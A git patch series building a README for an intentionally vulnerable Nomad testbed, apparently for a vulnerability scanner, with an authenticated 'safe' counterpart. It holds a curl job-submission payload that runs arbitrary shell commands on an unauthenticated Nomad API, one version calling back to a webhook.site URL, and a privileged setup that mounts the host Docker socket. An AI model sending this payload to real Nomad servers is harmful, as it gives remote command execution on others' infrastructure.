From 23833181edf39a28ae8e20d1c1a79324d2089a23 Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Thu, 14 Aug 2025 01:27:57 +0400
Subject: [PATCH 01/14] unauthenticated nomad instance
---
hashicorp/nomad/exposed_ui/README.md | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 hashicorp/nomad/exposed_ui/README.md
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
new file mode 100644
index 00000000..bdf1b7e9
--- /dev/null
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -0,0 +1,22 @@
+# setup an unauthenticated nomad ui
+you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install
+OR base on ubuntu 24.04, docker should be installed.
+```bash
+wget https://releases.hashicorp.com/nomad/1.10.4/nomad_1.10.4_linux_amd64.zip
+unzip nomad_1.10.4_linux_amd64.zip && rm nomad_1.10.4_linux_amd64.zip
+sudo ./nomad agent -dev \
+-bind 0.0.0.0 \
+-network-interface='{{ GetDefaultInterfaces | attr "name" }}'
+
+# open another terminal
+sudo ./nomad ui --show-url
+```
+
+# confirming the exposed ui
+```bash
+# replace the COMMAND_HERE with your command like `curl url`
+curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,
"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'
+
+# clean up
+curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8'
+```
\ No newline at end of file
From fa9e28619fee1687cb427f35ed8dba40b9e61a93 Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Fri, 22 Aug 2025 00:25:41 +0400
Subject: [PATCH 02/14] use docker instead of install nomad in local
---
hashicorp/nomad/exposed_ui/README.md | 11 ++---------
1 file changed, 2 insertions(+), 9 deletions(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index bdf1b7e9..67c219ad 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -1,15 +1,8 @@ # setup an unauthenticated nomad ui you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install -OR base on ubuntu 24.04, docker should be installed. +OR base on ubuntu 24.04 with docker run the following command to run nomad: ```bash -wget https://releases.hashicorp.com/nomad/1.10.4/nomad_1.10.4_linux_amd64.zip -unzip nomad_1.10.4_linux_amd64.zip && rm nomad_1.10.4_linux_amd64.zip -sudo ./nomad agent -dev \ --bind 0.0.0.0 \ --network-interface='{{ GetDefaultInterfaces | attr "name" }}' - -# open another terminal -sudo ./nomad ui --show-url +docker run --rm -it --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw -p 4646:4646 hashicorp/nomad:1.10 agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` # confirming the exposed ui
From 35a247ccc23fd0453b59bdc1933f5b00c9fce080 Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Fri, 13 Feb 2026 20:36:30 +0400
Subject: [PATCH 03/14] setup an authenticated nomad ui (safe)
---
hashicorp/nomad/exposed_ui/README.md | 41 ++++++++++++++++++++++++++--
1 file changed, 38 insertions(+), 3 deletions(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 67c219ad..491ebf2a 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -1,8 +1,12 @@ -# setup an unauthenticated nomad ui +# setup an unauthenticated nomad ui (vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ```bash -docker run --rm -it --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw -p 4646:4646 hashicorp/nomad:1.10 agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' +docker run --rm -it \ + -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -p 4646:4646 \ + hashicorp/nomad:1.10 \ + agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` # confirming the exposed ui
@@ -12,4 +16,35 @@ curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' -``` \ No newline at end of file +``` + +# setup an authenticated nomad ui (safe) +This version enables Nomad's ACL system, which requires a valid token for all API and UI access. +```bash +docker run --rm -it \ + --name nomad-safe \ + -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -p 4646:4646 \ + hashicorp/nomad:1.10 \ + agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \ + -acl-enabled +``` + +After the agent starts, bootstrap the ACL system to get a management token: +```bash +docker exec nomad-safe nomad acl bootstrap +``` +This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. + +# confirming the safe setup +Without a valid token, API requests are rejected with a 403: +```bash +curl 'http://localhost:4646/v1/jobs' +# Permission denied +``` +With the management token, requests succeed: +```bash +# Replace with the Secret ID from the bootstrap step +curl -H "X-Nomad-Token: " 'http://localhost:4646/v1/jobs' +# Expected output(when there is no job): [] +```
From 8e9cc5f23634b4528e7eed592d4921ce1b8ee2d4 Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Fri, 20 Feb 2026 05:30:26 +0400
Subject: [PATCH 04/14] add --privileged and warnings
---
hashicorp/nomad/exposed_ui/README.md | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 491ebf2a..14a1f200 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -1,9 +1,12 @@ # setup an unauthenticated nomad ui (vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: +## Warnings +1. The containers will run with `--privileged`. +2. the container doesn't run on the Apple Silicon ```bash docker run --rm -it \ - -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}'
@@ -23,7 +26,7 @@ This version enables Nomad's ACL system, which requires a valid token for all AP ```bash docker run --rm -it \ --name nomad-safe \ - -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \
From 6970ec56e9458030409bf3f3207ccc85e40ccba1 Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Fri, 20 Feb 2026 15:39:27 +0400
Subject: [PATCH 05/14] add '-v /var/run/docker.sock:/var/run/docker.sock'
---
hashicorp/nomad/exposed_ui/README.md | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 14a1f200..5e4b4057 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -5,8 +5,9 @@ OR base on ubuntu 24.04 with docker run the following command to run nomad: 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon ```bash -docker run --rm -it \ +sudo docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}'
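Review bot: The added `-v /var/run/docker.sock:/var/run/docker.sock` line hands the host's Docker daemon to an agent that this same command starts without ACLs and publishes with `-p 4646:4646`, which Docker binds on every host interface by default; together with `--privileged`, anyone who can reach port 4646 on the machine gets control of the host rather than of a throwaway container. If the testbed is only scanned from the same machine, the publish line could read `-p 127.0.0.1:4646:4646 \`. The `## Warnings` list visible in this hunk's context mentions only `--privileged`; a third item such as `3. The host Docker socket is mounted into the container; run this only on an isolated, disposable host.` would cover the new mount. The `nomad-safe` hunk later in this patch gains the same mount, so the bootstrap management token there carries the same reach and deserves the same warning.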
@@ -15,7 +16,7 @@ docker run --rm -it \ # confirming the exposed ui ```bash # replace the COMMAND_HERE with your command like `curl url` -curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"N
UMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' +curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":nu
ll,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' 
@@ -24,9 +25,10 @@ curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content # setup an authenticated nomad ui (safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash -docker run --rm -it \ +sudo docker run --rm -it \ --name nomad-safe \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \
@@ -35,7 +37,7 @@ docker run --rm -it \ After the agent starts, bootstrap the ACL system to get a management token: ```bash -docker exec nomad-safe nomad acl bootstrap +sudo docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token.
From 3bc38a6ef171692be5d0a180cfb5f34b42d78a2c Mon Sep 17 00:00:00 2001
From: am0o0 <77095239+am0o0@users.noreply.github.com>
Date: Fri, 20 Feb 2026 15:44:25 +0400
Subject: [PATCH 06/14] remove unnecessary sudo
---
hashicorp/nomad/exposed_ui/README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 5e4b4057..9a415dda 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -5,7 +5,7 @@ OR base on ubuntu 24.04 with docker run the following command to run nomad: 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon ```bash -sudo docker run --rm -it \ +docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \
@@ -25,7 +25,7 @@ curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content # setup an authenticated nomad ui (safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash -sudo docker run --rm -it \ +docker run --rm -it \ --name nomad-safe \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -v /var/run/docker.sock:/var/run/docker.sock \
@@ -37,7 +37,7 @@ sudo docker run --rm -it \ After the agent starts, bootstrap the ACL system to get a management token: ```bash -sudo docker exec nomad-safe nomad acl bootstrap +docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token.
From ba4715ea6896d23df5df6fd257c0fe3325fa9d04 Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:55:44 +0400
Subject: [PATCH 07/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 9a415dda..d4dc6cea 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -41,7 +41,7 @@ docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. -# confirming the safe setup +# Confirming the Safe Setup Without a valid token, API requests are rejected with a 403: ```bash curl 'http://localhost:4646/v1/jobs'
From c27d83dec1eb94119f20cbbfd2525c0c0460f55b Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:17 +0400
Subject: [PATCH 08/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index d4dc6cea..58e2176e 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -16,7 +16,7 @@ docker run --rm -it \ # confirming the exposed ui ```bash # replace the COMMAND_HERE with your command like `curl url` -curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl 
https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' +curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw 
'{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":n
ull,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8'
From 1e8c96a53a1bd670edc22722175e1b00cfcbb50a Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:26 +0400
Subject: [PATCH 09/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 58e2176e..f7fd72bd 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -1,4 +1,4 @@ -# setup an unauthenticated nomad ui (vulnerable) +# Set Up an Unauthenticated Nomad UI (Vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ## Warnings
From ede417f0cb5df8ca425a4e347ee758f0c1b7ed4f Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:34 +0400
Subject: [PATCH 10/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index f7fd72bd..d664902c 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -1,5 +1,5 @@ # Set Up an Unauthenticated Nomad UI (Vulnerable) -you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install +You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ## Warnings 1. The containers will run with `--privileged`.
From d390f2744fd459e811e486cdfc52f2bb453dc495 Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:42 +0400
Subject: [PATCH 11/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index d664902c..e334ef67 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
